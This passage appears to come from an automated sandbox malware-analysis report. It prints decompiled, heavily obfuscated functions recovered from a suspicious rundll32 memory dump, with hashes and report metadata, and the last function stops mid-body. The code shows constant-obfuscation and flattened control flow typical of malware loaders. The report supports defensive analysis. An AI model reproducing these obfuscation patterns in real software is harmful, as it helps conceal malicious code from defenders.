                                                                                                                          				_t451 = 0x5b;
                                                                                                                          				_v2608 = _v2608 / _t451;
                                                                                                                          				_v2608 = _v2608 ^ 0x00020c5c;
                                                                                                                          				_v2644 = 0x474c12;
                                                                                                                          				_v2644 = _v2644 + 0xffff00ab;
                                                                                                                          				_v2644 = _v2644 ^ 0x00446b0a;
                                                                                                                          				_v2760 = 0xca1d14;
                                                                                                                          				_t452 = 0x36;
                                                                                                                          				_v2760 = _v2760 / _t452;
                                                                                                                          				_v2760 = _v2760 ^ 0x098f5074;
                                                                                                                          				_v2760 = _v2760 ^ 0x8a27b7fe;
                                                                                                                          				_v2760 = _v2760 ^ 0x83afe7c4;
                                                                                                                          				_v2636 = 0x5d1272;
                                                                                                                          				_v2636 = _v2636 + 0xf4cf;
                                                                                                                          				_v2636 = _v2636 ^ 0x005057cd;
                                                                                                                          				_v2768 = 0x30e751;
                                                                                                                          				_v2768 = _v2768 | 0xcda5a365;
                                                                                                                          				_t453 = 5;
                                                                                                                          				_v2768 = _v2768 * 0x7d;
                                                                                                                          				_v2768 = _v2768 + 0xffff52f5;
                                                                                                                          				_v2768 = _v2768 ^ 0x71df24ad;
                                                                                                                          				_v2772 = 0x3d9f4c;
                                                                                                                          				_v2772 = _v2772 / _t453;
                                                                                                                          				_v2772 = _v2772 | 0x64d73223;
                                                                                                                          				_v2772 = _v2772 >> 2;
                                                                                                                          				_v2772 = _v2772 ^ 0x1935e4e1;
                                                                                                                          				_v2744 = 0xaeb35;
                                                                                                                          				_v2744 = _v2744 << 0x10;
                                                                                                                          				_v2744 = _v2744 + 0xffff2953;
                                                                                                                          				_v2744 = _v2744 + 0xffff82ad;
                                                                                                                          				_v2744 = _v2744 ^ 0xeb3966f5;
                                                                                                                          				_v2752 = 0x66dc67;
                                                                                                                          				_v2752 = _v2752 + 0x90a4;
                                                                                                                          				_v2752 = _v2752 + 0x6fc1;
                                                                                                                          				_v2752 = _v2752 ^ 0x6a9d4e17;
                                                                                                                          				_v2752 = _v2752 ^ 0x6af88c69;
                                                                                                                          				_v2716 = 0xce0c89;
                                                                                                                          				_v2716 = _v2716 ^ 0x42dcf22f;
                                                                                                                          				_v2716 = _v2716 | 0xbb0a480d;
                                                                                                                          				_v2716 = _v2716 ^ 0xfb186e5d;
                                                                                                                          				_v2616 = 0x5746b3;
                                                                                                                          				_v2616 = _v2616 | 0xa6a5976e;
                                                                                                                          				_v2616 = _v2616 ^ 0xa6f469a2;
                                                                                                                          				_v2708 = 0xa6d434;
                                                                                                                          				_v2708 = _v2708 << 0xa;
                                                                                                                          				_v2708 = _v2708 | 0x1b169a68;
                                                                                                                          				_v2708 = _v2708 ^ 0x9b5e88e0;
                                                                                                                          				_v2736 = 0x9f8594;
                                                                                                                          				_v2736 = _v2736 + 0xffffc5c7;
                                                                                                                          				_t454 = 9;
                                                                                                                          				_v2736 = _v2736 / _t454;
                                                                                                                          				_v2736 = _v2736 + 0xffff650c;
                                                                                                                          				_v2736 = _v2736 ^ 0x001c27e2;
                                                                                                                          				_v2668 = 0xeff616;
                                                                                                                          				_v2668 = _v2668 << 4;
                                                                                                                          				_v2668 = _v2668 ^ 0x0efcbcf0;
                                                                                                                          				_v2640 = 0x84564;
                                                                                                                          				_v2640 = _v2640 >> 9;
                                                                                                                          				_v2640 = _v2640 ^ 0x00099447;
                                                                                                                          				_v2648 = 0xb94e9c;
                                                                                                                          				_v2648 = _v2648 >> 7;
                                                                                                                          				_v2648 = _v2648 ^ 0x000c8381;
                                                                                                                          				_v2656 = 0x4f0029;
                                                                                                                          				_v2656 = _v2656 * 0x26;
                                                                                                                          				_v2656 = _v2656 ^ 0x0bb68559;
                                                                                                                          				_v2700 = 0xc64297;
                                                                                                                          				_v2700 = _v2700 << 0x10;
                                                                                                                          				_v2700 = _v2700 ^ 0xb6f38c4d;
                                                                                                                          				_v2700 = _v2700 ^ 0xf46a369f;
                                                                                                                          				_v2664 = 0x51e71d;
                                                                                                                          				_v2664 = _v2664 * 0xf;
                                                                                                                          				_v2664 = _v2664 ^ 0x04c73adc;
                                                                                                                          				_v2728 = 0xfedaba;
                                                                                                                          				_v2728 = _v2728 + 0xfffff930;
                                                                                                                          				_v2728 = _v2728 + 0xfffff3b0;
                                                                                                                          				_v2728 = _v2728 + 0xffff7b6e;
                                                                                                                          				_v2728 = _v2728 ^ 0x00f92d7b;
                                                                                                                          				_v2632 = 0xc4e34f;
                                                                                                                          				_t425 = _v2632 * 0x17;
                                                                                                                          				_v2632 = _t425;
                                                                                                                          				_v2632 = _v2632 ^ 0x11b64b79;
                                                                                                                          				_v2676 = 0x4fbb37;
                                                                                                                          				_v2676 = _v2676 + 0x433;
                                                                                                                          				_v2676 = _v2676 >> 1;
                                                                                                                          				_v2676 = _v2676 ^ 0x002442b0;
                                                                                                                          				_v2724 = 0xe01143;
                                                                                                                          				_v2724 = _v2724 | 0x0dc37ba2;
                                                                                                                          				_v2724 = _v2724 + 0xe020;
                                                                                                                          				_v2724 = _v2724 ^ 0x0dec213c;
                                                                                                                          				_v2624 = 0xd4ff52;
                                                                                                                          				_v2624 = _v2624 << 0xe;
                                                                                                                          				_v2624 = _v2624 ^ 0x3fd02267;
                                                                                                                          				_v2692 = 0xfd19e6;
                                                                                                                          				_v2692 = _v2692 + 0x8b9c;
                                                                                                                          				_v2692 = _v2692 | 0x5cbd23eb;
                                                                                                                          				_v2692 = _v2692 ^ 0x5cf129d9;
                                                                                                                          				while(_t503 != 0x5de06da) {
                                                                                                                          					if(_t503 == 0xea1969c) {
                                                                                                                          						_t503 = 0xfa9128f;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						_t515 = _t503 - 0xfa9128f;
                                                                                                                          						if(_t503 != 0xfa9128f) {
                                                                                                                          							L8:
                                                                                                                          							__eflags = _t503 - 0xa8e801c;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E007ADA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
                                                                                                                          							 *((short*)(E0079B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
                                                                                                                          							E00798969(_v2612,  &_v1560, _t515, _v2732, _v2704);
                                                                                                                          							_push(_v2660);
                                                                                                                          							_push(_v2756);
                                                                                                                          							E007947CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E007ADCF7(_v2620, 0x791308, _t515),  &_v1560, _v2720, _v2688);
                                                                                                                          							E0079A8B0(_v2608, _t437, _v2644);
                                                                                                                          							_t454 = _v2760;
                                                                                                                          							_t425 = E0079EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
                                                                                                                          							_t507 =  &(_t507[0x17]);
                                                                                                                          							if(_t425 != 0) {
                                                                                                                          								_t503 = 0x5de06da;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t425;
                                                                                                                          				}
                                                                                                                          				_push(_v2616);
                                                                                                                          				_push(_v2628);
                                                                                                                          				_push(_v2716);
                                                                                                                          				_push( &_v1040);
                                                                                                                          				E007A46BB(_v2744, _v2752);
                                                                                                                          				_push(_v2668);
                                                                                                                          				_push(_v2736);
                                                                                                                          				E007947CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E007ADCF7(_v2708, 0x791348, __eflags),  &_v2080, _v2700, _v2664);
                                                                                                                          				_t458 = _v2728;
                                                                                                                          				E0079A8B0(_t458, _t428, _v2632);
                                                                                                                          				_push(_v2692);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_t458);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_v2624);
                                                                                                                          				_t454 = _v2676;
                                                                                                                          				_push( &_v520);
                                                                                                                          				_t425 = E0079AB87(_v2676, _v2724, __eflags);
                                                                                                                          				_t507 = _t507 - 0xc + 0x64;
                                                                                                                          				_t503 = 0xa8e801c;
                                                                                                                          				goto L8;
                                                                                                                          			}
                                                                                                                          0x0079f1a4
                                                                                                                          0x0079f1a9
                                                                                                                          0x0079f1af
                                                                                                                          0x0079f1b4
                                                                                                                          0x0079f1bc
                                                                                                                          0x0079f1c4
                                                                                                                          0x0079f1cc
                                                                                                                          0x0079f1d4
                                                                                                                          0x0079f1dc
                                                                                                                          0x0079f1e7
                                                                                                                          0x0079f1f2
                                                                                                                          0x0079f1fd
                                                                                                                          0x0079f205
                                                                                                                          0x0079f20a
                                                                                                                          0x0079f213
                                                                                                                          0x0079f216
                                                                                                                          0x0079f21a
                                                                                                                          0x0079f222
                                                                                                                          0x0079f22a
                                                                                                                          0x0079f234
                                                                                                                          0x0079f238
                                                                                                                          0x0079f240
                                                                                                                          0x0079f24d
                                                                                                                          0x0079f258
                                                                                                                          0x0079f263
                                                                                                                          0x0079f26b
                                                                                                                          0x0079f276
                                                                                                                          0x0079f27b
                                                                                                                          0x0079f281
                                                                                                                          0x0079f289
                                                                                                                          0x0079f291
                                                                                                                          0x0079f29c
                                                                                                                          0x0079f2a7
                                                                                                                          0x0079f2b2
                                                                                                                          0x0079f2ba
                                                                                                                          0x0079f2bf
                                                                                                                          0x0079f2c7
                                                                                                                          0x0079f2d4
                                                                                                                          0x0079f2d7
                                                                                                                          0x0079f2db
                                                                                                                          0x0079f2e8
                                                                                                                          0x0079f2ec
                                                                                                                          0x0079f2f4
                                                                                                                          0x0079f307
                                                                                                                          0x0079f30e
                                                                                                                          0x0079f319
                                                                                                                          0x0079f321
                                                                                                                          0x0079f326
                                                                                                                          0x0079f32e
                                                                                                                          0x0079f336
                                                                                                                          0x0079f346
                                                                                                                          0x0079f34a
                                                                                                                          0x0079f34f
                                                                                                                          0x0079f357
                                                                                                                          0x0079f369
                                                                                                                          0x0079f36e
                                                                                                                          0x0079f377
                                                                                                                          0x0079f382
                                                                                                                          0x0079f38d
                                                                                                                          0x0079f398
                                                                                                                          0x0079f3a3
                                                                                                                          0x0079f3af
                                                                                                                          0x0079f3b4
                                                                                                                          0x0079f3ba
                                                                                                                          0x0079f3c2
                                                                                                                          0x0079f3ca
                                                                                                                          0x0079f3d2
                                                                                                                          0x0079f3dd
                                                                                                                          0x0079f3e8
                                                                                                                          0x0079f3f3
                                                                                                                          0x0079f3fb
                                                                                                                          0x0079f408
                                                                                                                          0x0079f409
                                                                                                                          0x0079f40d
                                                                                                                          0x0079f415
                                                                                                                          0x0079f41d
                                                                                                                          0x0079f42b
                                                                                                                          0x0079f42f
                                                                                                                          0x0079f437
                                                                                                                          0x0079f43e
                                                                                                                          0x0079f44b
                                                                                                                          0x0079f453
                                                                                                                          0x0079f458
                                                                                                                          0x0079f460
                                                                                                                          0x0079f468
                                                                                                                          0x0079f470
                                                                                                                          0x0079f478
                                                                                                                          0x0079f480
                                                                                                                          0x0079f488
                                                                                                                          0x0079f490
                                                                                                                          0x0079f498
                                                                                                                          0x0079f4a0
                                                                                                                          0x0079f4a8
                                                                                                                          0x0079f4b0
                                                                                                                          0x0079f4b8
                                                                                                                          0x0079f4c3
                                                                                                                          0x0079f4ce
                                                                                                                          0x0079f4d9
                                                                                                                          0x0079f4e1
                                                                                                                          0x0079f4e6
                                                                                                                          0x0079f4ee
                                                                                                                          0x0079f4f6
                                                                                                                          0x0079f4fe
                                                                                                                          0x0079f50c
                                                                                                                          0x0079f50f
                                                                                                                          0x0079f513
                                                                                                                          0x0079f51b
                                                                                                                          0x0079f523
                                                                                                                          0x0079f52b
                                                                                                                          0x0079f530
                                                                                                                          0x0079f538
                                                                                                                          0x0079f543
                                                                                                                          0x0079f54b
                                                                                                                          0x0079f556
                                                                                                                          0x0079f561
                                                                                                                          0x0079f569
                                                                                                                          0x0079f574
                                                                                                                          0x0079f587
                                                                                                                          0x0079f58e
                                                                                                                          0x0079f599
                                                                                                                          0x0079f5a1
                                                                                                                          0x0079f5a6
                                                                                                                          0x0079f5ae
                                                                                                                          0x0079f5b6
                                                                                                                          0x0079f5c3
                                                                                                                          0x0079f5c7
                                                                                                                          0x0079f5cf
                                                                                                                          0x0079f5d7
                                                                                                                          0x0079f5df
                                                                                                                          0x0079f5e7
                                                                                                                          0x0079f5ef
                                                                                                                          0x0079f5f7
                                                                                                                          0x0079f602
                                                                                                                          0x0079f60a
                                                                                                                          0x0079f611
                                                                                                                          0x0079f61c
                                                                                                                          0x0079f624
                                                                                                                          0x0079f62c
                                                                                                                          0x0079f630
                                                                                                                          0x0079f638
                                                                                                                          0x0079f640
                                                                                                                          0x0079f648
                                                                                                                          0x0079f650
                                                                                                                          0x0079f658
                                                                                                                          0x0079f663
                                                                                                                          0x0079f66b
                                                                                                                          0x0079f676
                                                                                                                          0x0079f67e
                                                                                                                          0x0079f686
                                                                                                                          0x0079f68e
                                                                                                                          0x0079f696
                                                                                                                          0x0079f6a4
                                                                                                                          0x0079f7b0
                                                                                                                          0x00000000
                                                                                                                          0x0079f6aa
                                                                                                                          0x0079f6aa
                                                                                                                          0x0079f6b0
                                                                                                                          0x0079f883
                                                                                                                          0x0079f883
                                                                                                                          0x0079f889
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079f6b6
                                                                                                                          0x0079f6d2
                                                                                                                          0x0079f700
                                                                                                                          0x0079f70a
                                                                                                                          0x0079f70f
                                                                                                                          0x0079f71b
                                                                                                                          0x0079f762
                                                                                                                          0x0079f777
                                                                                                                          0x0079f795
                                                                                                                          0x0079f799
                                                                                                                          0x0079f79e
                                                                                                                          0x0079f7a3
                                                                                                                          0x0079f7a9
                                                                                                                          0x00000000
                                                                                                                          0x0079f7a9
                                                                                                                          0x0079f7a3
                                                                                                                          0x0079f6b0
                                                                                                                          0x0079f898
                                                                                                                          0x0079f898
                                                                                                                          0x0079f7ba
                                                                                                                          0x0079f7c8
                                                                                                                          0x0079f7cf
                                                                                                                          0x0079f7de
                                                                                                                          0x0079f7df
                                                                                                                          0x0079f7e4
                                                                                                                          0x0079f7f0
                                                                                                                          0x0079f837
                                                                                                                          0x0079f843
                                                                                                                          0x0079f849
                                                                                                                          0x0079f858
                                                                                                                          0x0079f85c
                                                                                                                          0x0079f85e
                                                                                                                          0x0079f85f
                                                                                                                          0x0079f861
                                                                                                                          0x0079f863
                                                                                                                          0x0079f86e
                                                                                                                          0x0079f875
                                                                                                                          0x0079f876
                                                                                                                          0x0079f87b
                                                                                                                          0x0079f87e
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: kD$)$5$<!$Q0
                                                                                                                          • API String ID: 0-101729813
                                                                                                                          • Opcode ID: 13080b3ff0323e539aced3157a95ddd05e495e4660b7de6be2b34b9f398715ad
                                                                                                                          • Instruction ID: 038b7096e91711aa412f2262fb46af0706660de605365dd7bdf9faeab2618b6c
                                                                                                                          • Opcode Fuzzy Hash: 13080b3ff0323e539aced3157a95ddd05e495e4660b7de6be2b34b9f398715ad
                                                                                                                          • Instruction Fuzzy Hash: 3812F071508380DFD3A8CF21D48AA8BBBE2FBC5758F50891DE5D986260D7B58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A66CA() {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				signed int _v1044;
                                                                                                                          				intOrPtr _v1048;
                                                                                                                          				intOrPtr _v1052;
                                                                                                                          				intOrPtr _v1056;
                                                                                                                          				unsigned int _v1060;
                                                                                                                          				signed int _v1064;
                                                                                                                          				signed int _v1068;
                                                                                                                          				signed int _v1072;
                                                                                                                          				signed int _v1076;
                                                                                                                          				signed int _v1080;
                                                                                                                          				signed int _v1084;
                                                                                                                          				signed int _v1088;
                                                                                                                          				signed int _v1092;
                                                                                                                          				signed int _v1096;
                                                                                                                          				signed int _v1100;
                                                                                                                          				signed int _v1104;
                                                                                                                          				signed int _v1108;
                                                                                                                          				signed int _v1112;
                                                                                                                          				signed int _v1116;
                                                                                                                          				signed int _v1120;
                                                                                                                          				signed int _v1124;
                                                                                                                          				signed int _v1128;
                                                                                                                          				signed int _v1132;
                                                                                                                          				signed int _v1136;
                                                                                                                          				signed int _v1140;
                                                                                                                          				signed int _v1144;
                                                                                                                          				signed int _v1148;
                                                                                                                          				signed int _v1152;
                                                                                                                          				signed int _v1156;
                                                                                                                          				signed int _v1160;
                                                                                                                          				signed int _v1164;
                                                                                                                          				void* _t263;
                                                                                                                          				void* _t264;
                                                                                                                          				intOrPtr _t265;
                                                                                                                          				void* _t268;
                                                                                                                          				void* _t269;
                                                                                                                          				signed int _t272;
                                                                                                                          				signed int _t273;
                                                                                                                          				signed int _t274;
                                                                                                                          				signed int _t275;
                                                                                                                          				intOrPtr _t282;
                                                                                                                          				intOrPtr _t289;
                                                                                                                          				intOrPtr _t306;
                                                                                                                          				void* _t310;
                                                                                                                          				signed int* _t314;
                                                                                                                          
                                                                                                                          				_t314 =  &_v1164;
                                                                                                                          				_v1044 = _v1044 & 0x00000000;
                                                                                                                          				_v1056 = 0xc409ba;
                                                                                                                          				_v1052 = 0xa85c92;
                                                                                                                          				_v1048 = 0x441ffc;
                                                                                                                          				_v1160 = 0xafc02f;
                                                                                                                          				_v1160 = _v1160 + 0xffff4fb0;
                                                                                                                          				_v1160 = _v1160 + 0x85f3;
                                                                                                                          				_t272 = 0x2a;
                                                                                                                          				_v1160 = _v1160 / _t272;
                                                                                                                          				_v1160 = _v1160 ^ 0x000b1184;
                                                                                                                          				_t310 = 0xb516bbb;
                                                                                                                          				_v1060 = 0xeb49a4;
                                                                                                                          				_v1060 = _v1060 >> 5;
                                                                                                                          				_v1060 = _v1060 ^ 0x00095d90;
                                                                                                                          				_v1136 = 0x74fb0a;
                                                                                                                          				_t273 = 0x7f;
                                                                                                                          				_v1136 = _v1136 * 0x1e;
                                                                                                                          				_v1136 = _v1136 ^ 0x978de9ec;
                                                                                                                          				_v1136 = _v1136 ^ 0xad10b4f2;
                                                                                                                          				_v1136 = _v1136 ^ 0x372b3a8e;
                                                                                                                          				_v1152 = 0xb92c6e;
                                                                                                                          				_v1152 = _v1152 ^ 0x0e0e3092;
                                                                                                                          				_v1152 = _v1152 | 0x72fa6aba;
                                                                                                                          				_v1152 = _v1152 + 0xffff103c;
                                                                                                                          				_v1152 = _v1152 ^ 0x7efa5fdf;
                                                                                                                          				_v1128 = 0x794cf8;
                                                                                                                          				_v1128 = _v1128 ^ 0x9a366bfc;
                                                                                                                          				_v1128 = _v1128 + 0xde36;
                                                                                                                          				_v1128 = _v1128 ^ 0x5c71c30d;
                                                                                                                          				_v1128 = _v1128 ^ 0xc6263e62;
                                                                                                                          				_v1156 = 0x79c02;
                                                                                                                          				_v1156 = _v1156 + 0xfffffb46;
                                                                                                                          				_v1156 = _v1156 | 0x060cf66c;
                                                                                                                          				_v1156 = _v1156 ^ 0x799dfdb7;
                                                                                                                          				_v1156 = _v1156 ^ 0x7f9bfbef;
                                                                                                                          				_v1164 = 0xbfcf15;
                                                                                                                          				_v1164 = _v1164 >> 3;
                                                                                                                          				_v1164 = _v1164 << 0xc;
                                                                                                                          				_v1164 = _v1164 << 3;
                                                                                                                          				_v1164 = _v1164 ^ 0xfcf89fe4;
                                                                                                                          				_v1112 = 0xe0c8d1;
                                                                                                                          				_v1112 = _v1112 ^ 0xbad245c5;
                                                                                                                          				_v1112 = _v1112 << 5;
                                                                                                                          				_v1112 = _v1112 ^ 0x4653cc84;
                                                                                                                          				_v1116 = 0x38a8e4;
                                                                                                                          				_v1116 = _v1116 + 0xffff2cc2;
                                                                                                                          				_v1116 = _v1116 + 0x453c;
                                                                                                                          				_v1116 = _v1116 ^ 0x0030e111;
                                                                                                                          				_v1144 = 0x8706d;
                                                                                                                          				_v1144 = _v1144 | 0x44a168a8;
                                                                                                                          				_v1144 = _v1144 * 0x4d;
                                                                                                                          				_v1144 = _v1144 >> 0x10;
                                                                                                                          				_v1144 = _v1144 ^ 0x0002b082;
                                                                                                                          				_v1068 = 0x3ad283;
                                                                                                                          				_v1068 = _v1068 + 0xc4d8;
                                                                                                                          				_v1068 = _v1068 ^ 0x003ad5e6;
                                                                                                                          				_v1148 = 0xbbdd96;
                                                                                                                          				_v1148 = _v1148 / _t273;
                                                                                                                          				_v1148 = _v1148 + 0xffff10a8;
                                                                                                                          				_v1148 = _v1148 + 0xdbb9;
                                                                                                                          				_v1148 = _v1148 ^ 0x00089235;
                                                                                                                          				_v1084 = 0xf8cace;
                                                                                                                          				_v1084 = _v1084 ^ 0x230d76f6;
                                                                                                                          				_v1084 = _v1084 ^ 0x23f29212;
                                                                                                                          				_v1140 = 0x18cea;
                                                                                                                          				_v1140 = _v1140 << 3;
                                                                                                                          				_v1140 = _v1140 << 0xa;
                                                                                                                          				_v1140 = _v1140 + 0xffff66c6;
                                                                                                                          				_v1140 = _v1140 ^ 0x3196ba0a;
                                                                                                                          				_v1104 = 0x64ea4d;
                                                                                                                          				_v1104 = _v1104 >> 0xe;
                                                                                                                          				_v1104 = _v1104 << 0x10;
                                                                                                                          				_v1104 = _v1104 ^ 0x01951052;
                                                                                                                          				_v1120 = 0x40e961;
                                                                                                                          				_v1120 = _v1120 ^ 0xb7fb83c2;
                                                                                                                          				_v1120 = _v1120 + 0xb75e;
                                                                                                                          				_v1120 = _v1120 ^ 0xb7bbc099;
                                                                                                                          				_v1096 = 0x7779e0;
                                                                                                                          				_v1096 = _v1096 | 0x86983bb4;
                                                                                                                          				_v1096 = _v1096 ^ 0x86f0c1f2;
                                                                                                                          				_v1100 = 0xda5543;
                                                                                                                          				_v1100 = _v1100 + 0xffff2368;
                                                                                                                          				_v1100 = _v1100 + 0xffff6302;
                                                                                                                          				_v1100 = _v1100 ^ 0x00d61d50;
                                                                                                                          				_v1132 = 0x843ae5;
                                                                                                                          				_v1132 = _v1132 + 0xae05;
                                                                                                                          				_v1132 = _v1132 >> 9;
                                                                                                                          				_v1132 = _v1132 | 0xb52a1de5;
                                                                                                                          				_v1132 = _v1132 ^ 0xb5269cc0;
                                                                                                                          				_v1064 = 0x4bdca1;
                                                                                                                          				_t274 = 0x36;
                                                                                                                          				_v1064 = _v1064 * 0x2d;
                                                                                                                          				_v1064 = _v1064 ^ 0x0d50802d;
                                                                                                                          				_v1076 = 0xc70263;
                                                                                                                          				_v1076 = _v1076 ^ 0xed1c16c4;
                                                                                                                          				_v1076 = _v1076 ^ 0xeddf4f32;
                                                                                                                          				_v1108 = 0x3676a5;
                                                                                                                          				_v1108 = _v1108 << 0x10;
                                                                                                                          				_v1108 = _v1108 << 8;
                                                                                                                          				_v1108 = _v1108 ^ 0xa501f64e;
                                                                                                                          				_v1088 = 0x1a5bc1;
                                                                                                                          				_v1088 = _v1088 / _t274;
                                                                                                                          				_v1088 = _v1088 ^ 0x00023ab9;
                                                                                                                          				_v1092 = 0xcce8ca;
                                                                                                                          				_v1092 = _v1092 + 0xffff41cd;
                                                                                                                          				_v1092 = _v1092 ^ 0x00c96fdb;
                                                                                                                          				_v1072 = 0x26dee9;
                                                                                                                          				_t275 = 0x31;
                                                                                                                          				_v1072 = _v1072 * 0x7c;
                                                                                                                          				_v1072 = _v1072 ^ 0x12da7d33;
                                                                                                                          				_v1124 = 0xc51f8;
                                                                                                                          				_v1124 = _v1124 * 0x7c;
                                                                                                                          				_v1124 = _v1124 | 0x22e20644;
                                                                                                                          				_v1124 = _v1124 + 0xffff053d;
                                                                                                                          				_v1124 = _v1124 ^ 0x27f3e63a;
                                                                                                                          				_v1080 = 0x33633f;
                                                                                                                          				_v1080 = _v1080 / _t275;
                                                                                                                          				_v1080 = _v1080 ^ 0x000716b7;
                                                                                                                          				E007A5C73(_t275);
                                                                                                                          				do {
                                                                                                                          					while(_t310 != 0xc63ed) {
                                                                                                                          						if(_t310 == 0x5b9c87d) {
                                                                                                                          							_push(_v1104);
                                                                                                                          							_push(_v1140);
                                                                                                                          							_t263 = E007ADCF7(_v1084, 0x791060, __eflags);
                                                                                                                          							_t264 = E007AD25E(_v1120);
                                                                                                                          							_t282 =  *0x7b3e10; // 0x0
                                                                                                                          							_t265 =  *0x7b3e10; // 0x0
                                                                                                                          							E007A453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
                                                                                                                          							_t268 = E0079A8B0(_v1088, _t263, _v1092);
                                                                                                                          							_t314 =  &(_t314[0xa]);
                                                                                                                          							_t310 = 0xc63ed;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t310 == 0xb516bbb) {
                                                                                                                          								_t310 = 0xc84e726;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								_t319 = _t310 - 0xc84e726;
                                                                                                                          								if(_t310 == 0xc84e726) {
                                                                                                                          									_push(_v1128);
                                                                                                                          									_push(_v1152);
                                                                                                                          									_t269 = E007ADCF7(_v1136, 0x791000, _t319);
                                                                                                                          									_t289 =  *0x7b3e10; // 0x0
                                                                                                                          									_t306 =  *0x7b3e10; // 0x0
                                                                                                                          									E007947CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                          									_t268 = E0079A8B0(_v1068, _t269, _v1148);
                                                                                                                          									_t314 =  &(_t314[9]);
                                                                                                                          									_t310 = 0x5b9c87d;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					_push(_v1080);
                                                                                                                          					_push( &_v1040);
                                                                                                                          					_push(_v1124);
                                                                                                                          					E007B13AD(_v1072,  &_v520, __eflags);
                                                                                                                          					_t314 =  &(_t314[3]);
                                                                                                                          					_t310 = 0xafb2886;
                                                                                                                          					L9:
                                                                                                                          					__eflags = _t310 - 0xafb2886;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				return _t268;
                                                                                                                          			}



















































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <E$?c3$Md$a@$yw
                                                                                                                          • API String ID: 0-2084988834
                                                                                                                          • Opcode ID: cc47e4be658624a2c5b84ac9b559632d292d0301f4de702dae6f5b5aebd65e58
                                                                                                                          • Instruction ID: ca89ce471456ee2e56f065f6efb4d7b87356042a708fad511d51e356240dceb8
                                                                                                                          • Opcode Fuzzy Hash: cc47e4be658624a2c5b84ac9b559632d292d0301f4de702dae6f5b5aebd65e58
                                                                                                                          • Instruction Fuzzy Hash: 0EC122724083809FD768CF25D58A81BBBF1FBD4758F108A1DF5A696260D3B98909CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A0001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				char _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				intOrPtr _v136;
                                                                                                                          				intOrPtr _v140;
                                                                                                                          				char _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				signed int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v196;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v204;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t174;
                                                                                                                          				char _t178;
                                                                                                                          				void* _t183;
                                                                                                                          				char* _t189;
                                                                                                                          				void* _t209;
                                                                                                                          				signed int _t210;
                                                                                                                          				signed int _t211;
                                                                                                                          				signed int _t212;
                                                                                                                          				signed int _t213;
                                                                                                                          				signed int _t214;
                                                                                                                          				signed int _t215;
                                                                                                                          				signed int _t216;
                                                                                                                          				signed int* _t220;
                                                                                                                          
                                                                                                                          				_push(_a4);
                                                                                                                          				_t209 = __edx;
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t154);
                                                                                                                          				_v132 = _v132 & 0x00000000;
                                                                                                                          				_t220 =  &(( &_v204)[3]);
                                                                                                                          				_v140 = 0x6f537b;
                                                                                                                          				_v136 = 0x2895cf;
                                                                                                                          				_t183 = 0xf669bfa;
                                                                                                                          				_v164 = 0xc3509d;
                                                                                                                          				_v164 = _v164 >> 0xf;
                                                                                                                          				_v164 = _v164 ^ 0x0007728b;
                                                                                                                          				_v188 = 0x58efa0;
